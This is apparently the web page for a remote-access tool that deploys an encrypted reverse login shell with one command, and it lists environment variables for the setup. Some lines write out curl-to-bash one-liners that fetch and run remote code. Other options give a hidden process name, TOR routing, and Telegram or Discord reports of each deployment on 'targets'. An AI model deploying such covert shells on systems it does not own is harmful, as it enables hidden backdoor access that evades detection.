Connect like there is no firewall. Securely.
Deploy a reverse login shell with a single command (fully automated) - and access the shell remotely - encrypted - and via TOR if you like.
This must be the quickest way to access a system – anonymous
Use either one of these three commands to install, uninstall, and access:
Install
Uninstall
Access
Install
Uninstall
Access
Windows user need to manually install the binary. Contact us if you like to write a powershell deploy script.
Deploy on a host
Log in to the host from your workstation
Ignore SSL / Certificate warnings
Deploy with a predefined secret
Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP
Ignore SSL / Certificate warnings
Deploy with a predefined secret
Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP
Useful environment variables:
S= | Connect to a system (or use gs-netcat -s <secret> -il ). |
X= | Set a predefined secret for the installation (X like in inXstallation). |
GS_NOINST=1 | Only start but without installing (will not survive a reboot). |
GSOCKET_ARGS= | Use additonal arguments. Most often used to force TOR in combination with S=, e.g. GSOCKET_ARGS="-T" S=<secret> bash -c "$(curl -fsSLk https://gsocket.io/y) . |
GS_DSTDIR= | Set the installation directory. The default is to pick the most suitable automatically. Use find . -type d -writable . |
GS_URL_BASE= | Use URL for static binaries. An alternative base is https://github.com/hackerschoice/binary/raw/main/gsocket |
GS_OSARCH= | Force architecture. The default is to pick the most suitable automatically. |
GS_DEBUG=1 | Verbose output and other debug related settings. Often used together with GS_DEBUG=1 GS_NOSTART=1 GS_NOINST=1 bash -c "$(curl -fsSL https://gsocket.io/y)" . |
GS_HIDDEN_NAME= | Use a custom hidden process name. |
GS_HOST= | Use a specific GSRN server (or your own relay). Try GS_HOST=1.2.3.4 |
GS_PORT= | Use a specific GSRN port. Try any of 22,53,67,443,7350 |
GS_TG_TOKEN= | Telegram Bot Key for reporting successfull deployments. |
GS_TG_CHATID= | Telegram Chat ID. |
GS_DISCORD_KEY= | Report to Discord |
GS_WEBHOOK_KEY= | Report to webhook.site |
TMPDIR= | Use a custom temporary directory. Try TMPDIR=$(pwd) |
If all fails:
Download the static binary from https://github.com/hackerschoice/gsocket/releases/latest/. There also is an (unsupported) Windows binary or use qsocket.io.
(Note: GS_PORT=53 is only needed if port 443 is firewalled).
This method logs each successful deployment. The 1-line command creates an ephemeral and public facing HTTPS tunnel (via Cloudflare) so that your server can be behind NAT/Firewall:
Then execute a remote command like this:
Remembering many secrets from many deployments is cumbersome. It is easier to remember just one MASTER-SEED and derive the SECRET from the target’s hostname. The following script generates a secure SECRET based on a single MASTER-SEED and the target’s hostname.
Get Involved. We are looking for volunteers to work on the website and a logo and to discuss new ideas. Join us on telegram.